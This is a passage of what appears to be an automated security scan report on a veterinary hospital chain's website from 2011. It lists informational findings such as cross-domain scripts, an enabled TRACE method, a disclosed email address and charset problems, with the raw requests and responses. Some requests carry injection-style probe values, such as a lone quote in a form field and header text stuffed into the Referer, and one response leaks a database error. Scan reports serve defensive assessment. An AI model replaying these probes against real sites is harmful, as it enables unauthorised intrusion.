HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:44:12 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 87236 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... </script><script src="http://maps.google.com/maps?file=api&v=2&key=ABQIAAAA3yAtykvNwfZWXFMr5jaqbxQe81n6rsu4MMpbal4noyhM4BdC2xR3zat7Gh8uvXlxFvDMbMR1N9w9xw" type="text/javascript"> </script><script src="http://gmaps-utility-library.googlecode.com/svn/trunk/markermanager/release/src/markermanager.js" type="text/javascript"> </script>...[SNIP]...
8.6. http://www.vcahospitals.com/main/offer
Summary
Severity: Information
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer
Issue detail
The response dynamically includes the following scripts from other domains:
http://gmaps-utility-library.googlecode.com/svn/trunk/markermanager/release/src/markermanager.js
http://maps.google.com/maps?file=api&v=2&key=ABQIAAAA3yAtykvNwfZWXFMr5jaqbxQe81n6rsu4MMpbal4noyhM4BdC2xR3zat7Gh8uvXlxFvDMbMR1N9w9xw
Request
GET /main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:03:36 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=3qhitggrmrfo3b1eptve2npsb6; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 10741 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... <div class="content"><script src="http://maps.google.com/maps?file=api&v=2&key=ABQIAAAA3yAtykvNwfZWXFMr5jaqbxQe81n6rsu4MMpbal4noyhM4BdC2xR3zat7Gh8uvXlxFvDMbMR1N9w9xw" type="text/javascript"> </script><script src="http://gmaps-utility-library.googlecode.com/svn/trunk/markermanager/release/src/markermanager.js" type="text/javascript"> </script>...[SNIP]...
8.7. http://www.vcahospitals.com/main/offer/thank-you.html
Summary
Severity: Information
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer/thank-you.html
Issue detail
The response dynamically includes the following script from another domain: http://www.googleadservices.com/pagead/conversion.js
Request
POST /main/offer/thank-you.html? HTTP/1.1 Referer: http://www.vcahospitals.com/main/offer User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.vcahospitals.com Cookie: PHPSESSID=pias4t8ogigkmu02ec2s4oaee1 Accept-Encoding: gzip, deflate Content-Length: 491 fname='&lname=Ronald+Smith&addr=3&city=3&state=FL&zip=3&phone=3&email=netsparker%40example.com&other=3&petname=Ronald+Smith&petage=3&variant=3&submit=Get+FREE+Coupon&token=868810f83ce860bcd4cc393ef5f6...[SNIP]...
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:17:42 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 11572 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... </script> <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"> </script>...[SNIP]...
8.8. http://www.vcahospitals.com/manhattan-veterinary-group/appt.html
Summary
Severity: Information
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /manhattan-veterinary-group/appt.html
Issue detail
The response dynamically includes the following script from another domain: http://vca.unicaondemand.com/ods/js/imodTag.js
Request
GET /manhattan-veterinary-group/appt.html HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:44:45 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 21599 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... </script> <script src="http://vca.unicaondemand.com/ods/js/imodTag.js" type="text/javascript"> </script>...[SNIP]...
8.9. http://www.vcahospitals.com/marshfield
Summary
Severity: Information
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /marshfield
Issue detail
The response dynamically includes the following script from another domain: http://vca.unicaondemand.com/ods/js/imodTag.js
Request
GET /marshfield HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.15.10.1299326665
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:45:04 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 11200 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte...[SNIP]... </script> <script src="http://vca.unicaondemand.com/ods/js/imodTag.js" type="text/javascript"> </script>...[SNIP]...
8.10. http://www.vcahospitals.com/marshfield/appt.html
Summary
Severity: Information
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /marshfield/appt.html
Issue detail
The response dynamically includes the following script from another domain: http://vca.unicaondemand.com/ods/js/imodTag.js
Request
GET /marshfield/appt.html HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Referer: http://www.vcahospitals.com/marshfield Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.16.10.1299326665
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:45:38 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 21614 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... </script> <script src="http://vca.unicaondemand.com/ods/js/imodTag.js" type="text/javascript"> </script>...[SNIP]...
8.11. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html
Summary
Severity: Information
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /new-york-veterinary-hospital/appt.html
Issue detail
The response dynamically includes the following script from another domain: http://vca.unicaondemand.com/ods/js/imodTag.js
Request
GET /new-york-veterinary-hospital/appt.html HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:44:43 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 21408 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... </script> <script src="http://vca.unicaondemand.com/ods/js/imodTag.js" type="text/javascript"> </script>...[SNIP]...
8.12. http://www.vcahospitals.com/plymouth
Summary
Severity: Information
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /plymouth
Issue detail
The response dynamically includes the following script from another domain: http://vca.unicaondemand.com/ods/js/imodTag.js
Request
GET /plymouth HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.11.10.1299326665
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:45:00 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 11194 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte...[SNIP]... </script> <script src="http://vca.unicaondemand.com/ods/js/imodTag.js" type="text/javascript"> </script>...[SNIP]...
8.13. http://www.vcahospitals.com/plymouth/appt.html
Summary
Severity: Information
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /plymouth/appt.html
Issue detail
The response dynamically includes the following script from another domain: http://vca.unicaondemand.com/ods/js/imodTag.js
Request
GET /plymouth/appt.html HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.11.10.1299326665
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:44:59 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 21960 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... </script> <script src="http://vca.unicaondemand.com/ods/js/imodTag.js" type="text/javascript"> </script>...[SNIP]...
8.14. http://www.vcahospitals.com/plymouth/more/boarding.html
Summary
Severity: Information
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /plymouth/more/boarding.html
Issue detail
The response dynamically includes the following script from another domain: http://vca.unicaondemand.com/ods/js/imodTag.js
Request
GET /plymouth/more/boarding.html HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Referer: http://www.vcahospitals.com/plymouth/appt.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.22.10.1299326665
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:45:58 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 14056 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... </script> <script src="http://vca.unicaondemand.com/ods/js/imodTag.js" type="text/javascript"> </script>...[SNIP]...
9. TRACE method is enabled
Summary
Severity: Information
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /
Issue description
The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received. Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.
Issue remediation
The TRACE method should be disabled on the web server.
Request
TRACE / HTTP/1.0 Host: www.vcahospitals.com Cookie: 47e4c605f508f2ef
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:03:42 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 Connection: close Content-Type: message/http TRACE / HTTP/1.0 Host: www.vcahospitals.com Cookie: 47e4c605f508f2ef
10. Email addresses disclosed
Summary
Severity: Information
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /js/jquery.tablesorter.js
Issue detail
The following email address was disclosed in the response: christian.bach@polyester.se
Issue background
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content. However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
Request
GET /js/jquery.tablesorter.js HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:51:13 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 Last-Modified: Mon, 20 Apr 2009 21:39:56 GMT ETag: "10000000071c4-5b46-468035f114300" Accept-Ranges: bytes Content-Length: 23366 Content-Type: application/javascript /* * * TableSorter 2.0 - Client-side table sorting with ease! * Version 2.0.3 * @requires jQuery v1.2.3 * * Copyright (c) 2007 Christian Bach * Examples and docs at: http://tablesorter.com *...[SNIP]... ean flag indicating if tablesorter should display debuging information usefull for development. * * @type jQuery * * @name tablesorter * * @cat Plugins/Tablesorter * * @author Christian Bach/christian.bach@polyester.se */ (function($) { $.extend({ tablesorter: new function() { var parsers = [], widgets = []; this.defaults = { cssHeader: "header", cssAsc: "headerSortUp", cssDesc: "heade...[SNIP]...
11. HTML does not specify charset
There are 2 instances of this issue:
Issue description
If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters. In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.
11.1. http://www.vcahospitals.com/tools/SMSComm.php
Summary
Severity: Information
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /tools/SMSComm.php
Request
POST /tools/SMSComm.php HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Referer: http://www.vcahospitals.com/hanson Origin: http://www.vcahospitals.com X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.24.10.1299326665 Content-Length: 42 hospitalId=1122030&targetPhone=14445559999
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:52:19 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Content-Length: 92Content-Type: text/html <h3>WE'RE SORRY</h3><p>There was a problem sending your message. Please try again later.</p>
11.2. http://www.vcahospitals.com/tools/markers_sema.php
Summary
Severity: Information
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /tools/markers_sema.php
Request
GET /tools/markers_sema.php?sema=E13 HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Referer: http://www.vcahospitals.com/main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAwX-Requested-With:%20XMLHttpRequestAccept:%20*/*User-Agent:%20Mozilla/5.0%20(Windows;%20U;%20Windows%20NT%206.1;%20en-US)%20AppleWebKit/534.13%20(KHTML,%20like%20Gecko)%20Chrome/9.0.597.107%20Safari/534.13Accept-Encoding:%20gzip,deflate,sdchAccept-Language:%20en-US,en;q=0.8Accept-Charset:%20ISO-8859-1,utf-8;q=0.7,*;q=0.3Cookie:%20PHPSESSID= X-Requested-With: XMLHttpRequest Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5mvavkll88lopmn51r8r0kids0; __utmz=107294085.1299327491.1.2.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAwX-Requested-With:%20XMLHttpRequestAccept:%20*/*User-Agent:%20Mozilla/5.0%20(Windows; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.2.10.1299326665
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:17:23 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Content-Length: 52Content-Type: text/html Can't connect to MySQL server on 'localhost' (10061)
12. Content type incorrectly stated
There are 2 instances of this issue:
Issue background
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities. In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
12.1. http://www.vcahospitals.com/tools/SMSComm.php
Summary
Severity: Information
Confidence: Firm
Host: http://www.vcahospitals.com
Path: /tools/SMSComm.php
Issue detail
The response contains the following Content-type statement: Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
POST /tools/SMSComm.php HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Referer: http://www.vcahospitals.com/hanson Origin: http://www.vcahospitals.com X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.24.10.1299326665 Content-Length: 42 hospitalId=1122030&targetPhone=14445559999
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:52:19 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Content-Length: 92Content-Type: text/html <h3>WE'RE SORRY</h3><p>There was a problem sending your message. Please try again later.</p>
12.2. http://www.vcahospitals.com/tools/markers_sema.php
Summary
Severity: Information
Confidence: Firm
Host: http://www.vcahospitals.com
Path: /tools/markers_sema.php
Issue detail
The response contains the following Content-type statement: Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /tools/markers_sema.php?sema=E13 HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Referer: http://www.vcahospitals.com/main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAwX-Requested-With:%20XMLHttpRequestAccept:%20*/*User-Agent:%20Mozilla/5.0%20(Windows;%20U;%20Windows%20NT%206.1;%20en-US)%20AppleWebKit/534.13%20(KHTML,%20like%20Gecko)%20Chrome/9.0.597.107%20Safari/534.13Accept-Encoding:%20gzip,deflate,sdchAccept-Language:%20en-US,en;q=0.8Accept-Charset:%20ISO-8859-1,utf-8;q=0.7,*;q=0.3Cookie:%20PHPSESSID= X-Requested-With: XMLHttpRequest Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5mvavkll88lopmn51r8r0kids0; __utmz=107294085.1299327491.1.2.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAwX-Requested-With:%20XMLHttpRequestAccept:%20*/*User-Agent:%20Mozilla/5.0%20(Windows; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.2.10.1299326665
Response
